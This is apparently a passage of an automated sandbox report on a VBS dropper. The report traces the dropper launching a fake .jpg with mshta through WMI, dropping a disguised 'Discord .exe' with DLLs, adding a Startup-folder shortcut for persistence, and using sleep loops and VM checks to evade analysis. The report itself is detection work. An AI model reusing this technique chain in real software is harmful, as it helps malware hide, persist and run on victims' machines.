Anti Malware Scan Interface: CreateTextFile("C:\Users\user~1\AppData\Local\Temp\8901m.jpg", "true");ITextStream.Write("");ITextStream.Close();ISWbemObjectEx.Methods_("Create");ISWbemMethod.InParameters();ISWbemObjectEx.SpawnInstance_();ISWbemObjectEx._01800001("mshta.exe C:\Users\user~1\AppData\Local\Temp\8901m.jpg");ISWbemServicesEx.ExecMethod("Win32_Process", "Create", "Unsupported parameter type 00000009");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .exe");IFileSystem3.FileExists("C:\Users\user\Service\Discord .e

Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_004059F1 push edi; ret	14_2_004059F2
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE8BD5F push eax; mov dword ptr [esp], ebx	14_2_6DE8BF95
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE9842D push es; iretd	14_2_6DE98554
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE8C400 push eax; mov dword ptr [esp], ebx	14_2_6DE8CAD1
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE8BFEB push eax; mov dword ptr [esp], ebx	14_2_6DE8BF95
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE8BFF8 push eax; mov dword ptr [esp], ebx	14_2_6DE8BF95
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE8BFC4 push eax; mov dword ptr [esp], ebx	14_2_6DE8BF95
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE8BFDE push eax; mov dword ptr [esp], ebx	14_2_6DE8BF95
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE8BFD1 push eax; mov dword ptr [esp], ebx	14_2_6DE8BF95
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE939E2 push eax; mov dword ptr [esp], edi	14_2_6DE93A37
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE939DA push eax; mov dword ptr [esp], edi	14_2_6DE93A37
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE939DE push eax; mov dword ptr [esp], edi	14_2_6DE93A37
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE939D2 push eax; mov dword ptr [esp], edi	14_2_6DE93A37
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE939D6 push eax; mov dword ptr [esp], edi	14_2_6DE93A37
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE8C02C push eax; mov dword ptr [esp], ebx	14_2_6DE8BF95
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE9402C push eax; mov dword ptr [esp], edi	14_2_6DE94208
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE94025 push eax; mov dword ptr [esp], edi	14_2_6DE94208
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE94030 push eax; mov dword ptr [esp], edi	14_2_6DE94208
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE9C80D push edi; ret	14_2_6DE9C80E
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE83B8F push eax; mov dword ptr [esp], ebx	14_2_6DE83AC0
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE83B9F push eax; mov dword ptr [esp], ebx	14_2_6DE83AC0
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE8CB78 push eax; mov dword ptr [esp], ebx	14_2_6DE8CAD1
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE8CB70 push eax; mov dword ptr [esp], ebx	14_2_6DE8CAD1
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE8CB74 push eax; mov dword ptr [esp], ebx	14_2_6DE8CAD1
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE83B4E push eax; mov dword ptr [esp], ebx	14_2_6DE83AC0
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE83B40 push eax; mov dword ptr [esp], ebx	14_2_6DE83AC0
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE83B47 push eax; mov dword ptr [esp], ebx	14_2_6DE83AC0
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE83B55 push eax; mov dword ptr [esp], ebx	14_2_6DE83AC0
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE83B2E push eax; mov dword ptr [esp], ebx	14_2_6DE83AC0
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE83B39 push eax; mov dword ptr [esp], ebx	14_2_6DE83AC0
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE83B32 push eax; mov dword ptr [esp], ebx	14_2_6DE83AC0

Source: DFO1.dll.0.dr	Static PE information: section name: .eh_fram
Source: Discord .exe.0.dr	Static PE information: section name: .eh_fram
Source: DPUB1.dll.0.dr	Static PE information: section name: .eh_fram
Source: DRES1.dll.0.dr	Static PE information: section name: .eh_fram
Source: DSER1.dll.0.dr	Static PE information: section name: .eh_fram
Source: libcrypto-3.dll.0.dr	Static PE information: section name: .00cfg
Source: libgcc_s_dw2-1.dll.0.dr	Static PE information: section name: /4
Source: libssl.dll.0.dr	Static PE information: section name: .00cfg
Source: libstdc++-6.dll.0.dr	Static PE information: section name: /4

Source: C:\Users\user\Service\Discord .exe

Code function: 14_2_00401500 GetModuleHandleA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,

14_2_00401500

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\Service\Discord .exe	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\Service\libstdc++-6.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\Service\DFO1.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\Service\DRES1.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\Service\libgcc_s_dw2-1.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\Service\DPUB1.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\Service\libssl.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\Service\libcrypto-3.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\Service\DSER1.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\Service\libwinpthread-1.dll	Jump to dropped file

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\V3.lnk

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\V3.lnk

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Potential evasive VBS script found (sleep loop)

Source: Initial file

Initial file: WScript.Sleep(180000)

Source: C:\Windows\System32\wscript.exe TID: 5096	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Service\Discord .exe TID: 5468	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Users\user\Service\Discord .exe TID: 5480	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Service\Discord .exe TID: 5468	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Users\user\Service\Discord .exe TID: 5468	Thread sleep time: -660000s >= -30000s	Jump to behavior
Source: C:\Users\user\Service\Discord .exe TID: 5480	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Users\user\Service\Discord .exe TID: 5444	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Service\Discord .exe TID: 5480	Thread sleep time: -420000s >= -30000s	Jump to behavior
Source: C:\Users\user\Service\Discord .exe TID: 5496	Thread sleep time: -350000s >= -30000s	Jump to behavior
Source: C:\Users\user\Service\Discord .exe TID: 5656	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\Service\Discord .exe TID: 5484	Thread sleep time: -400000s >= -30000s	Jump to behavior
Source: C:\Users\user\Service\Discord .exe TID: 5444	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\Service\Discord .exe TID: 5444	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Service\Discord .exe TID: 5444	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Users\user\Service\Discord .exe TID: 5444	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\Service\Discord .exe TID: 5496	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Service\Discord .exe TID: 5444	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\Service\Discord .exe	Last function: Thread delayed
Source: C:\Users\user\Service\Discord .exe	Last function: Thread delayed

Source: C:\Users\user\Service\Discord .exe	Code function: _Z6VerDepii,GdipDisposeImage,GdipFree,GdipDisposeImage,GdipFree,_Z5Decreii,GetCursorPos,Sleep,_Z5Decreii,Sleep,GdipBitmapGetPixel,GdipBitmapGetPixel,GetCursorPos,GdipDisposeImage,GdipFree,GdipDisposeImage,GdipFree,_ZNKSs7compareEPKc,ReparNavi,_Z12ImprimeEcranv,GdipDisposeImage,GdipFree,ReparNavi,_Z3esTv,_ZNKSs7compareEPKc,_ZNSsC1ERKSs,_Z3C2MSsRSsS_S_S_Ri,_ZNSs4_Rep10_M_destroyERKSaIcE,_ZNSs4_Rep10_M_destroyERKSaIcE,	14_2_6DE85DC0
Source: C:\Users\user\Service\Discord .exe	Code function: WaitForSingleObject,GetCursorPos,Sleep,GetCursorPos,Sleep,Sleep,	14_2_6DE8A957
Source: C:\Users\user\Service\Discord .exe	Code function: _Z6BouSouv,GetCursorPos,GetCursorPos,Sleep,WaitForSingleObject,GetCursorPos,Sleep,GetCursorPos,Sleep,Sleep,	14_2_6DE8A910
Source: C:\Users\user\Service\Discord .exe	Code function: GetCursorPos,Sleep,ResetEvent,Sleep,_ZdlPv,CreateToolhelp32Snapshot,Process32First,Process32First,Process32Next,strstr,_Z4TeyPmj,Process32Next,CloseHandle,CloseHandle,CloseHandle,IsWindow,PostMessageA,_Z3CokP6HWND__S0_,CloseHandle,CloseHandle,_ZSt16__insertion_sortIN9__gnu_cxx17__normal_iteratorIPP6HWND__St6vectorIS3_SaIS3_EEEENS0_5__ops15_Iter_less_iterEEvT_SB_T0_,_ZSt8__uniqueIN9__gnu_cxx17__normal_iteratorIPP6HWND__St6vectorIS3_SaIS3_EEEENS0_5__ops19_Iter_equal_to_iterEET_SB_SB_T0_,IsWindow,IsWindow,_Z4QuiPP6HWND__S0_,_Z3CokP6HWND__S0_,WindowFromPoint,GetAncestor,_ZSt9__find_ifIN9__gnu_cxx17__normal_iteratorIPP6HWND__St6vectorIS3_SaIS3_EEEENS0_5__ops16_Iter_equals_valIKS3_EEET_SD_SD_T0_St26random_access_iterator_tag,_Z21ForceForegroundWindowP6HWND__,_Z6FermeWP6HWND__S0_,_Z3CokP6HWND__S0_,_Z4QuiPP6HWND__S0_,_Z3CokP6HWND__S0_,WindowFromPoint,GetAncestor,Sleep,_ZSt9__find_ifIN9__gnu_cxx17__normal_iteratorIPP6HWND__St6vectorIS3_SaIS3_EEEENS0_5__ops16_Iter_equals_valIKS3_EEET_SD_SD_T0_St26random_access_iterator_tag,_Z21ForceForegroundWindowP6HWND__,_Z6FermeWP6HWND__S0_,_Z3CokP6HWND__S0_,_Z4QuiPP6HWND__S0_,_Z3CokP6HWND__S0_,_ZSt16__insertion_sortIN9__gnu_cxx17__normal_iteratorIPP6HWND__St6vectorIS3_SaIS3_EEEENS0_5__ops15_Iter_less_iterEEvT_SB_T0_,memmove,	14_2_6DE8A200

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Service\Discord .exe	Thread delayed: delay time: 50000	Jump to behavior
Source: C:\Users\user\Service\Discord .exe	Thread delayed: delay time: 50000	Jump to behavior
Source: C:\Users\user\Service\Discord .exe	Thread delayed: delay time: 50000	Jump to behavior
Source: C:\Users\user\Service\Discord .exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\Service\Discord .exe	Thread delayed: delay time: 50000	Jump to behavior
Source: C:\Users\user\Service\Discord .exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\Service\Discord .exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\Service\Discord .exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\Service\Discord .exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\Service\Discord .exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\Service\Discord .exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\Service\Discord .exe	Thread delayed: delay time: 30000	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\Desktop FullSizeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: wscript.exe, 00000000.00000003.298255834.0000014839C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.273043407.000001483BB35000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.398845946.0000014839C14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.272088812.0000014839BEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.272611998.000001483BB35000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.398985044.000001483BB35000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.302550939.0000014839C01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.297273615.0000014839C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.303740835.0000014839C01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.272967376.0000014839C0F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.271507883.000001483BB35000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.273043407.000001483BB35000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.272611998.000001483BB35000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.398985044.000001483BB35000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.271507883.000001483BB35000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW&
Source: wscript.exe, 00000000.00000003.695028515.0000014839C24000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RA

Source: C:\Users\user\Service\Discord .exe

Code function: 14_2_00401500 GetModuleHandleA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,

14_2_00401500

Source: C:\Windows\System32\wbem\WmiPrvSE.exe

Process created: C:\Users\user\Service\Discord .exe C:\Users\user\Service\Discord .exe

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_00401179 Sleep,Sleep,SetUnhandledExceptionFilter,_acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,GetStartupInfoA,_initterm,exit,	14_2_00401179
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_00401FC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	14_2_00401FC0
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_00401FBC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	14_2_00401FBC
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE8E56C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	14_2_6DE8E56C
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE8E570 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	14_2_6DE8E570

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: DFO1.dll.0.dr

Jump to dropped file

Source: C:\Users\user\Service\Discord .exe

Code function: 14_2_6DE82740 _Z4CCk1i,GetWindowRect,Sleep,Sleep,SetWindowPos,Sleep,GetWindowTextLengthA,_Znaj,GetWindowTextA,strcmp,_Z6FermeWP6HWND__S0_,Sleep,FindWindowA,_Z3CokP6HWND__S0_,_ZdlPv,GetWindowTextLengthA,_Znaj,GetWindowTextA,SetWindowPos,_Z21ForceForegroundWindowP6HWND__,Sleep,mouse_event,Sleep,mouse_event,Sleep,_ZdlPv,_ZdlPv,

14_2_6DE82740

Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\a.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\a.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\a.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\a.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\a.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\x.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\x.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\x.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\x.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\x.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\x.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\x.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\x.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\x.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\x.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\x.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\x.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\x.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\x.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\x.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\x.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Service\Discord .exe

Code function: 14_2_00401F10 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

14_2_00401F10

Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE94DF0 _ZNSt6threadC1IRFivEIEEEOT_DpOT0_,_Znwj,_ZNSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFivEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE14_M_get_deleterERKSt9type_info,_ZNSt6thread15_M_start_threadESt10shared_ptrINS_10_Impl_baseEE,	14_2_6DE94DF0
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE94DB0 _ZNSt6thread5_ImplISt12_Bind_simpleIFPFvvEvEEED1Ev,	14_2_6DE94DB0
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE94D60 _ZNSt6thread5_ImplISt12_Bind_simpleIFPFvvEvEEED0Ev,_ZdlPv,	14_2_6DE94D60
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE94D50 _ZNSt6thread5_ImplISt12_Bind_simpleIFPFvvEvEEE6_M_runEv,	14_2_6DE94D50
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE94D10 _ZNSt6thread5_ImplISt12_Bind_simpleIFPFivEvEEED1Ev,	14_2_6DE94D10
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE94CC0 _ZNSt6thread5_ImplISt12_Bind_simpleIFPFivEvEEED0Ev,_ZdlPv,	14_2_6DE94CC0
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE94CA0 _ZNSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFvvEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EED1Ev,	14_2_6DE94CA0
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE94CB0 _ZNSt6thread5_ImplISt12_Bind_simpleIFPFivEvEEE6_M_runEv,	14_2_6DE94CB0
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE94C90 _ZNSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFvvEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EED0Ev,_ZdlPv,	14_2_6DE94C90
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE94C60 _ZNSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFvvEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE14_M_get_deleterERKSt9type_info,_ZNKSt9type_infoeqERKS_,	14_2_6DE94C60
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE94C40 _ZNSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFvvEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE10_M_destroyEv,_ZdlPv,	14_2_6DE94C40
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE94C50 _ZNSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFvvEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE10_M_disposeEv,	14_2_6DE94C50
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE94C20 _ZNSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFivEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EED0Ev,_ZdlPv,	14_2_6DE94C20
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE94C30 _ZNSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFivEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EED1Ev,	14_2_6DE94C30
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE987C0 _ZTSSt11_Mutex_baseILN9__gnu_cxx12_Lock_policyE2EE,_ZTSSt16_Sp_counted_baseILN9__gnu_cxx12_Lock_policyE2EE,_ZTSSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFvvEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE,	14_2_6DE987C0
